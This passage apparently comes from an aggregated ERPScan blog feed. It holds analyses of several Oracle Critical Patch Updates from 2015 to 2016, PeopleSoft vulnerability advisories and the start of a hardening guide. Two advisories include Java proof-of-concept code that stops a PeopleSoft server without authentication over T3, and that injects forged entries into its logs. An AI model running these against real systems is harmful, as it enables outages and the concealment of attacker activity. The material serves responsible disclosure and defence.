• XXE injection vulnerability (CVSS Base Score: 6.4) Successful exploitation of this vulnerability can result in unauthorized update, insert or delete access to some Oracle Report Manager accessible data as well as read access to a subset of Oracle Report Manager accessible data.
• XXE injection vulnerability(CVSS Base Score: 6.8) Successful exploitation of this vulnerability can result in unauthorized update, insert or delete access to some Oracle Report Manager accessible data as well as read access to a subset of Oracle Report Manager accessible data.
• XXE injection vulnerability(CVSS Base Score: 6.8) Successful exploitation of this vulnerability can result in unauthorized update, insert or delete access to some Oracle Report Manager accessible data as well as read access to a subset of Oracle Report Manager accessible data.

Securing Oracle applications

It is highly recommended that Oracle customers patch all those vulnerabilities to prevent business risks affecting their systems.Companies providing services should include these vulnerabilities in their checklists.

The post Oracle Critical Patch Update October 2015 – Analyzing Oracle Security appeared first on ERPScan.

Today Oracle has released its quarterly patch update for January 2016. It fixes a total of 248 vulnerabilities. It’s a record number of security issues patched by Oracle in one update ever, and the figures look like the record number of vulnerabilities patched by any vendor in one update. Defining moment in the history of Oracle Security

Comparing with the previous CPU for October 2015 that closed 154 security vulnerabilities, this one addresses 62% more security issues and almost 2,5 times more than the average number (100).

Image may be NSFW.
Clik here to view.

The number of vulnerabilities in Oracle’s Enterprise business applications is increasing. While in previous years the significant part of the closed vulnerabilities affect JAVA, MySQL, and Oracle Database, this critical patch update shows a significant growth in the number of patches for Enterprise applications such as Oracle EBS (32% of all patched vulnerabilities), Oracle Fusion Middleware - a new Oracle’s platform for all business applications (11%) - and Oracle PeopleSoft (4%). To put it simple, vulnerabilities in all the products that store and process the most valuable corporate data constitute the largest part of all vulnerabilities patched in this update.

The trend of rising number of vulnerabilities in enterprise applications has started earlier: for instance, in October 2015, Oracle patched 12 vulnerabilities in Oracle EBS, 6 of them were discovered by ERPScan Research interns. It was only 2 months after Oracle’s CSO Mary Ann Davidson told that Oracle doesn’t need any help from external researchers.

But this quarter, Oracle closed 78 vulnerabilities in the core platform of Oracle’s most common Enterprise application - Oracle EBS (E-Business Suite). 2 of them were discovered by the same ERPScan interns. It’s almost a record number of vulnerabilities patched by a company in one product in one update ever, only Adobe’s Flash had more.

All these 78 issues are of great importance because they affect mission-critical business applications based on E-Business Suite platform such as Value Chain Execution suite, Value Chain Planning, Advanced Procurement, Supply Chain Management, Project Portfolio Management, Human Capital Management, Financial Management, Service Management, and Customer Relationship Management. These applications store and process the most valuable corporate data such as HR information, financial information, supplier and customer lists, and others. In case of successful attack, a malicious person can manipulate data about quantity of material resources, change the item prices, misappropriate funds, and modify financial reports, just to name a few.

Oracle Critical Patch Update Analysis

Below you can find an analysis of the most significant vulnerabilities closed by this Critical Patch Update provided by ERPScan Research and Oracle Security Intelligence teams.

Oracle vunerabilities by Application type

Image may be NSFW.
Clik here to view.

The affected product families are as follows (listed by the number of closed issues in descending order): Oracle E-Business Suite, Oracle Enterprise Manager Grid Control, Oracle Fusion Middleware, Oracle Sun Systems Products Suite, Oracle MySQL, Oracle PeopleSoft, Oracle Virtualization, Oracle Retail Applications, Oracle Java SE, Oracle JD Edwards, Oracle Database Server, Oracle Communications Applications, Oracle Supply Chain Products Suite, Oracle GoldenGate, and Oracle iLearning.

Oracle vunerabilities by severity

Image may be NSFW.
Clik here to view.

Oracle Security by business-critical applications

This quarter’s CPU contains patches for vulnerabilities affecting a scope of the most crucial business applications from Oracle, namely, Oracle E-Business Suite, Oracle Fusion Middleware, Oracle PeopleSoft, Oracle Retail Applications, Oracle JD Edwards, Oracle Supply Chain Products, Oracle Database Server. About 53% (144) of all of the patch updates close vulnerabilities in these products. Moreover, 103 (about 71%) of these vulnerabilities can be exploited remotely without authentication.

Oracle E-Business Suite Security

Image may be NSFW.
Clik here to view.

Oracle E-Business Suite is the main business software developed by Oracle. As it manages a wide range of business processes and stores key data, a successful attack against Oracle EBS allows an attacker to steal and manipulate different business critical information, depending on modules installed in an organization.

The number of closed issues is noteworthy; this critical patch update contains 78 fixes for Oracle EBS, while the previous quarter’s update contains 12 updates and the average number of closed issues is 9,75 (as for 2015). The highest CVSS score is 6.4.

Oracle PeopleSoft Security

Image may be NSFW.
Clik here to view.

Oracle PeopleSoft is an application suite of business and industry solutions such as PeopleSoft Human Capital Management, Financial management, Supplier Relationship Management, Enterprise Services Automation, and Supply Chain Management. As it manages a wide range of business processes and stores key data, a successful attack against PeopleSoft allows an attacker to steal or manipulate different business critical information, depending on modules installed in an organization. This Critical patch update contains 11 fixes for Oracle PeopleSoft and the previous quarter’s update contains 8. The highest CVSS score of 5.5.

Oracle JD Edwards Security

Image may be NSFW.
Clik here to view.

Oracle JDE is a set of various business applications. As it manages a wide range of business processes and stores key data, a successful attack against JD Edwards allows an attacker to steal and manipulate different business critical information, depending on modules installed in an organization.

This Critical patch update contains 7 fixes for Oracle JDE with the highest CVSS score of 7.8.

The most critical Oracle vulnerabilities closed by CPU January 2016

Oracle prepares Risk Matrices and associated documentation describing the conditions required to exploit a vulnerability, and the potential impact of a successful attack. The severity of the vulnerabilities is calculated via the Common Vulnerability Scoring System (CVSS). This aims to help Oracle customers to fix the most critical issues first. This time, 5 vulnerabilities have received the highest CVSS score of 10.0. Most of them relate to the Oracle Java SE.

• Java SE, Java SE Embedded has CVE-2016-0494 (CVSS Base Score: 10.0) - Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: 2D). Supported versions that are affected are Java SE: 6u105, 7u91 and 8u66; Java SE Embedded: 8u65. Easily exploitable vulnerability allows successful unauthenticated network attacks via multiple protocols. Successful exploit of this vulnerability can lead to unauthorized Operating System takeover including arbitrary code execution. Applies to client deployment of Java only. This vulnerability can be exploited only through sandboxed Java Web Start applications and sandboxed Java applets.
• Java SE, Java SE Embedded has CVE-2015-8126 (CVSS Base Score: 10.0) - Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: AWT). Supported versions that are affected are Java SE: 6u105, 7u91 and 8u66; Java SE Embedded: 8u65. Easily exploitable vulnerability allows successful unauthenticated network attacks via multiple protocols. Successful exploit of this vulnerability can lead to unauthorized Operating System takeover including arbitrary code execution. Applies to client deployment of Java only. This vulnerability can be exploited only through sandboxed Java Web Start applications and sandboxed Java applets
• Java SE, Java SE Embedded, JRockit has CVE-2016-0483 (CVSS Base Score: 10.0) - Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: AWT). Supported versions that are affected are Java SE: 6u105, 7u91 and 8u66; Java SE Embedded: 8u65; JRockit: R28.3.8. Easily exploitable vulnerability allows successful unauthenticated network attacks via multiple protocols. Successful attack of this vulnerability can result in unauthorized Operating System takeover including arbitrary code execution. Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service.
• Oracle GoldenGate has CVE-2016-0451 (CVSS Base Score: 10.0) - Vulnerability in the Oracle GoldenGate component of Oracle GoldenGate. Supported versions that are affected are 11.2 and 12.1.2. Easily exploitable vulnerability allows successful unauthenticated network attacks via Oracle Golden Gate. Successful attack of this vulnerability can result in unauthorized Operating System takeover including arbitrary code execution. The CVSS score is 10.0 only on Windows for Database versions prior to 12c.
• Oracle GoldenGate has CVE-2016-0452 (CVSS Base Score: 10.0) - Vulnerability in the Oracle GoldenGate component of Oracle GoldenGate. Supported versions that are affected are 11.2 and 12.1.2. Easily exploitable vulnerability allows successful unauthenticated network attacks via Oracle Golden Gate. Successful attack of this vulnerability can result in unauthorized Operating System takeover including arbitrary code execution. The CVSS score is 10.0 only on Windows for Database versions prior to 12c.

Oracle Vulnerabilities that were patched with the help of ERPScan

This quarter, 2 critical vulnerabilities discovered by ERPScan researchers were closed . All of the issues affect Oracle E-Business suite.

By following the links, you can find the details of the security flaws identified by ERPScan researchers.

• XXE injection vulnerability
• XXE injection vulnerability

Securing Oracle applications

It is highly recommended that organizations patch all those vulnerabilities to prevent business risks affecting their systems. Companies providing Oracle Security assessment and Oracle Penetration testing services should include these vulnerabilities in their checklists. The tests for the latest vulnerabilities in Oracle PeopleSoft are included in ERPScan Security Monitoring Suite for Oracle PeopleSoft.

The post Oracle Security Analysis – Oracle Critical Patch Update January 2016 appeared first on ERPScan.

Today Oracle has released its quarterly patch update for April 2016. It fixes a total of 136 vulnerabilities.

Comparing with the previous record-breaking CPU for January 2016 that closed 248 vulnerabilities, this one addresses about 55% less security issues. However, this number is almost the same as a typical Oracle patch update includes in average.

Image may be NSFW.
Clik here to view.

The differences between CVSS v 3.0 and CVSS v2.0 for ERP systems.

Starting from this Critical Patch Update, all the future fixes will be scored using Common Vulnerability Scoring Standard (CVSS) of version 3.0. This quarter the updates will be rated both by the CVSS 2.0 and 3.0.

It is noteworthy that according to CVSS base score ver. 3.0 no vulnerabilities have received the highest rating of 10.0. In our opinion, it doesn’t mean that the closed vulnerabilities are less critical (that is proved by 5 issues of the highest severity by CVSS 2.0).

CVSS version 3 is the latest update of the standardized method for rating vulnerabilities. It was introduced in June, 2015, and now more and more companies started to use this new scoring system (for example, other world-renowned software vendor SAP) . In comparison with CVSS 2.0, several metrics were changed, added, and removed. The most significant changes from the version 2.0 are the following (more information available in User Guide):

• The terms vulnerable component and impacted component were introduced. Exploitability metrics are calculated for a vulnerable component while impact metrics are scored for an affected one, which is a good innovation. Sometimes vulnerability can be discovered in a less critical component but can affect a whole system. This fact is especially noteworthy when we speak about ERP systems and other mission-critical applications which consist of multiple components where some vulnerabilities in them may affect all system and others may not. It’s quite hard to understand the impact of a certain issue without in-depth knowledge of affected system architecture.
• The new metrics User Interaction, Scope, and Privileges Required (replaces Authentication) were added.
• The Access Vector has been renamed to Attack Vector.
• The Impact metric shifted from quantitative to qualitative values; Confidentiality, Integrity and Availability values of None, Partial, and Complete have been replaced with None, Low, and High to reflect the degree of attack impact.
• Guidance on assessing multiple vulnerabilities is provided.

CVSS changes influence on Oracle Critical patch update

So, the most important question is what has really changed for people responsible for securing ERP systems.

The table below shows how the severity of vulnerabilities from Oracle CPU April 2016 depends on the scoring system.

The final figures are showing that while we have much less vulnerabilities with the highest rating of 10.0 according to the new scoring system, the overall number of vulnerabilities rated Critical (and High) has grown (while the number of Low and Medium risk issues decreased slightly).

Image may be NSFW.
Clik here to view.

First of all, I’m glad to see such changes in the scoring system, as there were many discussions about the quality of CVSS v.2.0. For example, vendors could rate issues discovered in their products as less critical (intentionally or unintentionally) because of some flaws in this scoring system. Now the recently updated system is more accurate and many drawbacks affecting the previous version were resolved. On the other hand, it’s great that Oracle took it seriously and started to use the newest scoring system. Recently (in March, 2016) another large ERP vendor - SAP - switched to CVSS v. 3 as well

- commented Alexander Polyakov, CTO at ERPScan.

Oracle Critical Patch Update April 2016 Analysis

Below you can find an analysis of the most significant vulnerabilities closed by this Critical Patch Update provided by ERPScan Research and Security Intelligence teams.

Oracle vulnerabilities by Application type

Image may be NSFW.
Clik here to view.

The affected product families are listed below (by the number of closed issues in descending order): Oracle MySQL, Oracle Fusion Middleware, Oracle Sun Systems Products Suite, Oracle PeopleSoft, Oracle Java SE, Oracle E-Business Suite, Oracle Supply Chain Products Suite, Oracle Database Server, Oracle Berkeley DB, Oracle Virtualization, Oracle Financial Services Software, Oracle Retail Applications, Oracle Siebel CRM, Oracle Enterprise Manager Grid Control, Oracle JD Edwards, Oracle Health Sciences Applications, Oracle Communications Applications.

Oracle vulnerabilities by severity. CVSS 2.0

Image may be NSFW.
Clik here to view.

Image may be NSFW.
Clik here to view.

Security of Oracle business-critical applications

This quarter’s CPU contains patches for vulnerabilities affecting a scope of the most business applications from Oracle, namely, Oracle E-Business Suite, Oracle Fusion Middleware, Oracle PeopleSoft, Oracle Retail Applications, Oracle JD Edwards, Oracle Supply Chain Products, and Oracle Database Server. 43% (59) of all of the patch updates close vulnerabilities in these products.

Oracle E-Business Suite Security

Oracle E-Business Suite is the main business software developed by Oracle. As it manages a wide range of business processes and stores key data, a successful attack against Oracle EBS allows an attacker to steal and manipulate different business critical information depending on modules installed in an organization.

This critical patch update contains 7 fixes for Oracle EBS. The highest CVSS score is 6.4 (CVSS 2.0)/ 9.1 (CVSS v. 3.0). The previous quarter’s update contains 78 updates, however, the average number of closed issues is about 10 (as for 2015).

Oracle PeopleSoft Security

Oracle PeopleSoft is an application suite of business and industry solutions such as PeopleSoft Human Capital Management, Financial management, Supplier Relationship Management, Enterprise Services Automation, and Supply Chain Management. As it manages a wide range of business processes and stores key data, a successful attack against PeopleSoft allows an attacker to steal or manipulate different business critical information depending on modules installed in an organization.

This Critical patch update contains 15 fixes for Oracle PeopleSoft and the previous quarter’s update contains 11. The highest CVSS score is 6.5(CVSS 2.0)/ 8.7 (CVSS v. 3.0).

Oracle JD Edwards Security

Oracle JDE is a set of various business applications. As it manages a wide range of business processes and stores key data, a successful attack against JD Edwards allows an attacker to steal and manipulate different business critical information depending on modules installed in an organization.

This Critical patch update contains 1 fix for Oracle JDE with the CVSS score of 6.4(CVSS 2.0)/ 6.5 (CVSS v. 3.0).

The most critical Oracle vulnerabilities closed by CPU April 2016

Oracle prepares Risk Matrices and associated documentation describing the conditions required to exploit a vulnerability, and the potential impact of a successful attack. This time, 7 vulnerabilities have received the highest CVSS score of 10.0 (CVSS 2.0). Most of them relate to the Oracle Java SE.

• Java SE (2D) has CVE-2016-3443 (CVSS v. 2.0 Base Score: 10.0 CVSS v. 3.0 Base Score: 9.6) - Supported versions that are affected are Java SE: 6u113, 7u99 and 8u77. Easily exploitable vulnerability allows a unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE.
• Java SE, Java SE Embedded (Hotspot) has CVE-2016-0687 (CVSS v. 2.0 Base Score: 10.0 CVSS v. 3.0 Base Score: 9.6) - Supported versions that are affected are Java SE: 6u113, 7u99 and 8u77; Java SE Embedded: 8u77. Easily exploitable vulnerability allows a unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded.
• Java SE, Java SE Embedded (Serialization) has CVE-2016-0686 (CVSS v. 2.0 Base Score: 10.0 CVSS v. 3.0 Base Score: 9.6) - Supported versions that are affected are Java SE: 6u113, 7u99 and 8u77; Java SE Embedded: 8u77. Easily exploitable vulnerability allows a unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded.
• Java SE, Java SE Embedded, JRockit (JMX) has CVE-2016-3427 (CVSS v. 2.0 Base Score: 10.0 CVSS v. 3.0 Base Score: 9.0) - Supported versions that are affected are Java SE: 6u113, 7u99 and 8u77; Java SE Embedded: 8u77; JRockit: R28.3.9. Difficult to exploit vulnerability allows a unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. While the vulnerability is in Java SE, Java SE Embedded, JRockit, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded, JRockit.
• Solaris (PAM LDAP module) has CVE-2016-0693 (CVSS v. 2.0 Base Score: 10.0 CVSS v. 3.0 Base Score: 9.8) - Vulnerability in the Solaris component of Oracle Sun Systems Products Suite. Supported versions that are affected are 10 and 11.3. Easily exploitable vulnerability allows a unauthenticated attacker with network access via multiple protocols to compromise Solaris. Successful attacks of this vulnerability can result in takeover of Solaris.
• MySQL Server (Server: Packaging) has CVE-2016-0705 (CVSS v. 2.0 Base Score: 10.0 CVSS v. 3.0 Base Score: 9.8) - Vulnerability in the MySQL Server component of Oracle MySQL. Supported versions that are affected are 5.6.29 and earlier and 5.7.11 and earlier. Easily exploitable vulnerability allows a unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in takeover of MySQL Server.
• MySQL Server (Server: Pluggable Authentication) has CVE-2016-0639 (CVSS v. 2.0 Base Score: 10.0 CVSS v. 3.0 Base Score: 9.8) - Vulnerability in the MySQL Server component of Oracle MySQL. Supported versions that are affected are 5.6.29 and earlier and 5.7.11 and earlier. Easily exploitable vulnerability allows a unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in takeover of MySQL Server.

Securing Oracle applications

It is highly recommended that organizations patch all those vulnerabilities to prevent business risks affecting their systems. Companies providing Oracle Security Audit Penetration testing should include these vulnerabilities in their checklists. The tests for the latest vulnerabilities in Oracle PeopleSoft are included in ERPScan Security Monitoring Suite for Oracle PeopleSoft.

The post CVSS 3.0 – How does it Affect Oracle Critical Patch Update? appeared first on ERPScan.

Today Oracle has released its quarterly patch update for October 2016. It fixes a total of 253 vulnerabilities.

The main highlights are as follows:

• 1. This is the second-largest Update containing 253 vulnerability fixes. Almost every Oracle CPU released in 2016 contains more than 200 fixes, while the average number for the years 2011-2015 is approximately 110.
• 2. The updates close a lot of security issues in the business-critical applications from Oracle. For example, Oracle E-Business Suite has the highest number of updates among mission-critical software containing 21 issues where 11 are assessed as high. 14 of them can be exposed online providing an entry point for attackers. The number and criticality of the issues are alarming.
• 3. There is a critical vulnerability in HTTP service of Oracle EBS patched in this update. ERPScan researchers conducted a Shodan scanning and revealed that approximately 15000 Oracle HTTP servers are exposed to the Internet.

Oracle Critical Patch Update October 2016

Comparing with the previous CPU for July 2016 that closed 276 vulnerabilities, this one addresses approximately 11% less security issues. Nonetheless, this it the second largest update in the history

Image may be NSFW.
Clik here to view.

"Oracle started this year by releasing a CPU consisting of 248 patches, which immediately made headlines as a record-breaking number of fixes. As of today, this patch update seems to be a game-changing moment. Looking at the graph above, we can assume that the exceeding the two-hundred mark in terms of number of closed issues was not fortuitousness. This seems to be a trend for all sets of patches released in 2016, and only CPU for April 2016 is at odds with it."

- commented Alexander Polyakov, CTO at ERPScan.

Oracle Critical Patch Update Analysis

Below you can find an analysis of the most significant vulnerabilities closed by this Critical Patch Update provided by ERPScan Research and Oracle Security Intelligence teams.

Oracle vulnerabilities by Application type

Image may be NSFW.
Clik here to view.

The affected product families are listed in descending order of the number of closed issues:

Vulnerabilities in Oracle business-critical applications

This quarter’s CPU contains numerous patches for vulnerabilities affecting a scope of the most crucial business applications from Oracle, namely, Oracle E-Business Suite, Oracle Fusion Middleware, Oracle PeopleSoft, Oracle Retail Applications, Oracle JD Edwards, Oracle Supply Chain Products, Oracle Database Server. About 39% (97) of all of the patch updates close vulnerabilities in these products, and about 64% of these vulnerabilities can be exploited remotely without authentication.

Oracle E-Business Suite Security

Image may be NSFW.
Clik here to view.

Oracle E-Business Suite (EBS) is the main business software developed by Oracle. As it manages a wide range of business processes and stores key data, a successful attack against Oracle EBS allows an attacker to steal and manipulate different business critical information, depending on modules installed in an organization.

This critical patch update contains 21 fixes for Oracle EBS. The highest CVSS score is 8.2.

Among the vulnerable components, there is Oracle HTTP server, the web server component of Oracle EBS. The vulnerability is assessed as critical (CVSS base score of 8.2). According to Oracle's advisory, the vulnerability is easily exploitable and allows unauthenticated attacker with network access via HTTP to compromise Oracle HTTP Server. Successful attacks of this vulnerability can result in complete DoS of Oracle HTTP Server and unauthorized read access to data.
ERPScan researchers conducted a Shodan scanning and revealed that approximately 15000 Oracle HTTP servers are exposed to the Internet.

Oracle PeopleSoft Security

Oracle PeopleSoft is an application suite of business and industry solutions such as PeopleSoft Human Capital Management, Financial management, Supplier Relationship Management, Enterprise Services Automation, and Supply Chain Management. As it manages a wide range of business processes and stores key data, a successful attack against PeopleSoft allows an attacker to steal or manipulate different business critical information, depending on modules installed in an organization.

This Critical patch update contains 11 fixes for Oracle PeopleSoft with the highest CVSS score of 8.2.

Oracle JD Edwards Security

Oracle JDE is a set of various business applications. As it manages a wide range of business processes and stores key data, a successful attack against JD Edwards allows an attacker to steal and manipulate different business critical information, depending on modules installed in an organization.

This Critical patch update contains 2 fixes for Oracle JDE with the highest CVSS score of 8.1.

Oracle Siebel CRM Security

Oracle Siebel CRM is a Customer Relationship Management solution. It delivers transactional, analytical, and engagement features. A successful attack against it can result in gaining control over tenders and affect relationship with clients.

This Critical patch update contains 3 fixes for Oracle Siebel CRM with the CVSS base score of 8.1.

The most critical Oracle vulnerabilities closed by CPU October 2016

Oracle prepares Risk Matrices and associated documentation describing the conditions required to exploit a vulnerability, and the potential impact of a successful attack. The severity of the vulnerabilities is calculated via the Common Vulnerability Scoring System (CVSS ). This aims to help Oracle customers to fix the most critical issues first.

The most critical issues closed by the CPU are as follows

• Oracle Big Data Discovery has CVE-2015-3253 (CVSS Base Score: 9.8) - Vulnerability in the Oracle Big Data Discovery component of Oracle Fusion Middleware (subcomponent: Data Processing). Supported versions that are affected are 1.1.1, 1.1.3 and 1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Big Data Discovery. Successful attacks of this vulnerability can result in takeover of Oracle Big Data Discovery.
• Oracle Web Services has CVE-2016-3551 (CVSS Base Score: 9.8) - Vulnerability in the Oracle Web Services component of Oracle Fusion Middleware (subcomponent: JAXWS Web Services Stack). Supported versions that are affected are 11.1.1.7.0, 11.1.1.9.0, 12.1.3.0.0 and 12.2.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Web Services. Successful attacks of this vulnerability can result in takeover of Oracle Web Services.
• Oracle WebLogic Server has CVE-2016-5535 (CVSS Base Score: 9.8) - Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: None). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0 and 12.2.1.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
• Oracle Commerce Platform has CVE-2015-3253 (CVSS Base Score: 9.8) - Vulnerability in the Oracle Commerce Platform component of Oracle Commerce (subcomponent: Dynamo Application Framework). Supported versions that are affected are 10.0.3.5, 10.2.0.5 and 11.2.0.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Commerce Platform. Successful attacks of this vulnerability can result in takeover of Oracle Commerce Platform.
• Java SE, Java SE Embedded has CVE-2016-5582 (CVSS Base Score: 9.6) - Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Hotspot). Supported versions that are affected are Java SE: 6u121, 7u111 and 8u102; Java SE Embedded: 8u101. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded.

Securing Oracle applications

It is highly recommended that organizations patch all those vulnerabilities to prevent business risks affecting their systems. Companies providing Oracle Security assessment and Oracle Penetration testing services should include these vulnerabilities in their checklists. The tests for the latest vulnerabilities in Oracle PeopleSoft are included in ERPScan Security Monitoring Suite for Oracle PeopleSoft.

The post Analyzing Oracle Security – Oracle Critical Patch Update October 2016 appeared first on ERPScan.

Application: Oracle PeopleSoft
Versions Affected: PeopleTools 8.54, 8.55
Vendor: Oracle
Bugs: Directory Traversal and Authentication Bypass
Reported: 16.03.2017
Vendor response: 17.03.2017
Date of Public Advisory: 18.07.2017
Reference: Oracle CPU July 2017
Authors: Dmitrii Iudin aka @ret5et (ERPScan)

VULNERABILITY INFORMATION

Class: Directory Traversal
Risk: Medium
Impact: Read file from system
Remotely Exploitable: Yes
CVE Name: CVE-2017-10146

CVSS Information

CVSS Base Score v3: 8.3 / 10
CVSS Base Vector:

VULNERABILITY DESCRIPTION

Oracle PeopleSoft HCM 9.2 suffers from critical directory traversal vulnerability.

An attacker could read the content of arbitrary files on the remote server and expose sensitive data.

VULNERABLE PACKAGES

Oracle PeopleSoft HCM 9.2

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, implement Oracle CPU July 2017

The post [ERPSCAN-17-040] Anonymous Directory Traversal Vulnerability (Double Encode) – PeopleSoft appeared first on ERPScan.

Application: Oracle PeopleSoft
Versions Affected: PeopleSoft FSCM 9.2
Vendor: Oracle
Bug: Missing Authentication for Critical Function
Reported: 16.03.2017
Vendor response: 17.03.2017
Date of Public Advisory: 18.07.2017
Reference: Oracle CPU July 2017
Authors: Vahagn Vardanyan (ERPScan)

VULNERABILITY INFORMATION

Class: Missing Authentication
Risk: High
Impact: Impact on availability
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2017-10147

CVSS Information

CVSS Base Score v3: 8.6 / 10
CVSS Base Vector:

VULNERABILITY DESCRIPTION

An attacker can use a special T3 request for stopping the remote server.

VULNERABLE PACKAGES

PeopleSoft FSCM 9.2

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, implement Oracle CPU July 2017.

TECHNICAL DESCRIPTION

The vulnerability is presented in WebLogic/cluster/singleton/ServerMigrationCoordinator class in migrate functionality.

When we call the migrate function using T3 protocol, the PeopleSoft server will be stopped without authorization.

@Override
    public void migrate(final String serverName, final String sourceMachine, final String destinationMachine, final boolean sourceDown, final boolean destinationDown) throws ServerMigrationException {
        ServerMigrationTask task = this.taskMap.get(serverName);
        if (task == null) {
            task = new ServerMigrationTask(serverName, destinationMachine);
            if (MigrationDebugLogger.isDebugEnabled()) {
                MigrationDebugLogger.debug(serverName + " New Migration Task " + task);
            }
            this.taskMap.put(serverName, task);
            try {
                this.stopServer(sourceDown, task);
                this.startServer(destinationDown, task);
            }
            finally {
                this.taskMap.remove(serverName);
            }
            return;
        }
        throw new ServerMigrationException("Migration operation in progress", null);
    }

Proof of Concept

static boolean rem_server_stop(String PS_SERVER_IP, Server PS_SERVER_PORT) throws NamingException, JMSException, RemoteException, T3Exception, ServerMigrationException {
        Properties p = new Properties();
        p.put(Context.INITIAL_CONTEXT_FACTORY, "weblogic.jndi.WLInitialContextFactory");
        p.put(Context.PROVIDER_URL, "t3://"+PS_SERVER_IP+":"+PS_SERVER_PORT);
        Context ctx = new InitialContext(p);
        Object obj = ctx.lookup("weblogic/cluster/singleton/ServerMigrationCoordinator");
        Object o = PortableRemoteObject.narrow(obj, ServerMigrationCoordinator.class);
        ServerMigrationCoordinator h = (ServerMigrationCoordinator) o;
        h.migrate("PIA","а","any_data_or_ip", true, true);
        return false;
    }

The post [ERPSCAN-17-041] Unauthorized Container Shutdown In ServerMigrationCoordinator appeared first on ERPScan.

Application: Oracle PeopleSoft
Versions Affected: PeopleSoft FSCM 9.2
Vendor: Oracle
Bug: Anonymous log injection
Reported: 16.03.2017
Vendor response: 17.03.2017
Date of Public Advisory: 18.07.2017
Reference: Oracle CPU July 2017
Authors: Vahagn Vardanyan (ERPScan)

VULNERABILITY INFORMATION

Class: Log injection
Risk: High
Impact: Fraud log events, hiding actions on the system
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2017-10148

CVSS Information

CVSS Base Score v3: 5.8 / 10
CVSS Base Vector:

VULNERABILITY DESCRIPTION

An attacker can use a special T3 request to inject special data to log files.

VULNERABLE PACKAGES

PeopleSoft FSCM 9.2

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, implement Oracle CPU July 2017.

TECHNICAL DESCRIPTION

Proof of Concept

static boolean anon_log_injection(String PS_SERVER_IP,String PS_SERVER_PORT) throws NamingException, JMSException, RemoteException, T3Exception, ServerMigrationException, PersistentStoreException {
        Properties p = new Properties();
        p.put(Context.INITIAL_CONTEXT_FACTORY, "weblogic.jndi.WLInitialContextFactory");
        p.put(Context.PROVIDER_URL, "t3://"PS_SERVER_IP+":"+PS_SERVER_PORT);
        Context ctx = new InitialContext(p);
        Object obj = ctx.lookup("weblogic.common.T3Services");
        Object o = PortableRemoteObject.narrow(obj, T3ServicesDef.class);
        T3ServicesDef h = (T3ServicesDef) o;

                h.log().log("ERPScan_1\n\rERPScan_2");
		h.log().info("ERPScan_3\n\rERPScan_4");
		h.log().error("ERPScan_5\n\rERPScan_6");
		h.log().warning("ERPScan_7\n\rERPScan_8");
		h.log().debug("ERPScan_9\n\rERPScan_10");
        return false;
    }

The post [ERPSCAN-17-042] Anonymous log injection in FSCM appeared first on ERPScan.

A typical PeopleSoft system is quite large and complex, so there are a lot of settings, which affect its security. Some of them we have already described. This part of the guideline is focused on specific insecure configurations, which can’t be tied to any other group.

There are 4 important areas that should be covered; one is common for any large ERP system and the remaining ones are specific to PeopleSoft.

Password Configuration [EASSEC-PVAG-PS-15]

Description

Password policies include everything that concerns user accounts: minimum password length, its complexity, number of logon attempts, etc.

PeopleSoft is typically used by a large number of users, and the chance that someone will try to bruteforce a password of one of them is quite high. PeopleSoft allows rather detailed and precise configuration of password policies, but they rarely implemented correctly. Here we will list only the most important parameters that should be implemented properly.

Common Password Controls Settings and their default values:

Threat

If Password Controls Settings doesn’t configured duly, an attacker can easily bruteforce the password and сonsequently penetrate into the system. For instance, if password length is less than 8 characters, and Failed Logon attempts parameter is 0, it will facilitate bruteforcing; if failed logon attempts is set to more than 0, it’s also an issue that can be exploited by getting access to the password hash.

Solution

The best practice is to configure Password Controls Settings properly in accordance with the company security policy. If the security policy of a company does not set Password Controls Settings, it’s recommended to set the following parameters:

To change the settings, go to tabs PeopleTools > Security > Password Configuration > Password Controls. When changes are made, press the Save button

Default Encryption Key [EASSEC-PVAG-PS-16]

Description

The PSCipher feature encrypts and decrypts text used in your PeopleSoft system. System administrators interact with PSCipher through a Java; command line utility is located on the web server, which enables you to encrypt text, such as user IDs and passwords, stored in configuration files. PSCipher also involves a runtime element implemented on the application server that decrypts the encrypted text.

